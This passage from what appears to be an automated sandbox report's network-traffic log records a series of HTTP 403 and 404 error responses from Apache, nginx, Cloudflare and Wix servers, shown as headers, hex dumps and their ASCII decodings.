6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:01 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:55:08 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:11 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FIKjterjs031%2B8z7yJ73im%2FBHRYaNPgu%2FjOmPSnT6vKuBi87RmYf3lMc3xG33F1gGRjfj6OhcDhU%2B43dUqBtnOZGh%2FeQeUTFxQVZg98U9FgepBWggqp6i54qexfYay4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a6928b40bb50-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:11 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WhvzXhU%2BduVstiG8tsizKjBUK%2FEF%2B%2BQ9CACOlIHBOPBdyEqjD8bZ46FvojguBaUuhOShAvS8AAz%2FUz7T4sXLPNjNQub7FJ%2BkkPAbTUdOIRcIL4Op%2F%2FF40i%2BGzyXSYWU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a692bb67bb50-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:55:13 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:14 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:14 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:18 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I7m3c5CYcqCcyjrcTIkzeCGu6RFFsJDDVQ7YZ4LivlBsbdmF1SX5uGWfhjCLdmoT7oYkc1frHGsFS8BRnovajpwKej9c8a2MgIAtiiwV4xrqCH1GpalH5IO1xL%2FnuTY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a6bcf8603a61-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:18 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wgZfraM8RaM7FnJxVQh0mkY4n6UWdofDXB8ez6SbpfAmhRMfyUTMfl02oTvadZiqRJK46UdJ59lIaLQ8ty%2FH%2B312FVhHzrL%2FKRxVf%2BYqhL3ZTvhSud462WsGso9IIjw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a6bd28973a61-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:20 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdR+KIVPfgRMI8Uu3xBu5ub,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1678431320.814184376853016340X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:20 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BpwO2fKwVYDbh2%2B3fLH1fYiDFsivaMQ1tjtt2LsBA%2BMZAnk28zIkK6RDpqzDIPjbkj6s1btOySPufF%2BFyAiJfdo%2BgPdm6wOoHYsjn3bIxN3ivrNBvgZO4I6x5XWJsXWx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a6cb0a9a694b-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:55:20 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:25 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eEpuVVQ2VHCjvSMhosEkscVsvwqjs0ZMhx4p8g%2FyaU8qZEvDRhgnXdzk9hORMj%2FygXF7iY9R6Q%2BrwshvxUy0vx7gSIwoAqMXiznlWOc0SbVjnAhXvT6F%2FIVBLlO5SHLN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a6e6795a694b-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fYFK%2FEbhjYEXcSrdZMnCZC%2Bhenwsh0Gxbm7Z8%2F2LCOurTXKCOb65Pfy%2Fm69PfXthAgI43yLh96rdeJx6ZCw2eqo1JFLSnGSRqPRlE00DUrI2QZEDmHZrvtiqXUGNJQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a6ebdd5630e7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 Data Ascii: 1c5d<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:26 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7X5cto2vEJYvnFPJrBs2mNHxr%2BjZEBXHUOZV24qEMyetRuTGg0zVgOH1ek3V5%2Fnrw3uAR%2F5B5afj0g58l4bopSeElJXg%2BpmKOIaOBASra%2FLMVZ35%2FjF2Iu6ymNlkXs4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a6f0d9b93626-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
